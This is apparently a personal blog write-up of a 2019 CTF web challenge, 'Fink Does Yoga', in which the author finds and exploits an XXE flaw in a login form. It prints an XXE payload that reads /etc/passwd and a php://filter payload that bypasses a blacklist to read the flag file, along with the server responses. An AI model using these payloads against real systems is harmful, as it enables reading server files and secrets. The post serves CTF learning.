2019 Stonecutters - Fink Does Yoga

The "Fink Does Yoga" website was a very basic login form to schedule a yoga class. No matter what you entered as credentials, the username was reflected back to the user on the next page that loaded and the password given didn't really seem to matter. I started this challenge fuzzing bad characters to find some kind of injection vulnerability.

I found that entering a "<" as the username gave me an interesting error. Seen below is the complete response:

Warning: DOMDocument::loadXML(): StartTag: invalid element name in Entity, line: 1 in /app/web/login.php on line 22

Warning: simplexml_import_dom(): Invalid Nodetype to import in /app/web/login.php on line 24
Hi there, ! Welcome back.
No spots are available at the moment. Please check back later. 

I noticed XML errors in this output so I tried the following XXE injection attack against the username field:

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

The response to this test was the following:

Getting tricky, eh? I'm super smart and blocked you. This is why you can't have nice things. #BlacklistFTW

I stepped through the XXE attack by first entering <?xml as the username, then <?xml version until I found that the string "file://" was blacklisted. 

While I found that I could use entity and php:// in the attack, the web app gave me a bunch of errors helping me correctly format what I needed to request.

Eventually, I had what I believed to be a correctly formatted attack but I kept getting an error about extra content at the end of the document in entity, or something along those lines.

At this point I begged @ranger_cha to help me out because something wasn't clicking for me and she asked me why I wasn't using burp, which to this day I have no idea why I wasn't. . .In her immortal words "make the request your bitch!"  ...or something along those lines :D 

So, I ended up looking at the request in burp and found that when I submitted the request there were tags added to the request data that were throwing off my attack. I sent the request to repeater and removed the extra tags so my request now looked like:

data=<!DOCTYPE root [ <!ENTITY strupo SYSTEM "php://filter/read=bzip2.compress/read=convert.base64-encode/resource=/flag.txt">]><userLogin><userName>&strupo;</userName><userPass></userPass></userLogin> 

The webserver then responded with:

<b>Warning</b>:  DOMDocument::loadXML(): unable to locate filter &quot;bzip2.compress&quot; in <b>/app/web/login.php</b> on line <b>22</b><br />
<br />
<b>Warning</b>:  DOMDocument::loadXML(): Unable to create filter (bzip2.compress) in <b>/app/web/login.php</b> on line <b>22</b><br />
Hi there,ZmxhZ3tJRWF0RE9OVVRTJlhYRUZvckJyZWFrZmFzdH0=! Welcome back. 

I base64 decoded the string for the flag: 


Along the way to solving this challenge, I also found an XSS vulnerability by using CDATA to open and close the tags. I'm not sure that they are necessary in every single tag or just the <script> tags, but I figured I'd share the PoC anyway:



Honestly, this was my first time messing around with XXE. Another reason why I love CTFs. I know people have said that CTFs are not "real hacking" but sometimes they kind of are.


Popular posts from this blog

The Audacity of Some CTFs

Code Name: Treehouse of Horror CTF

2020 HTH CTF - Cloud Challenges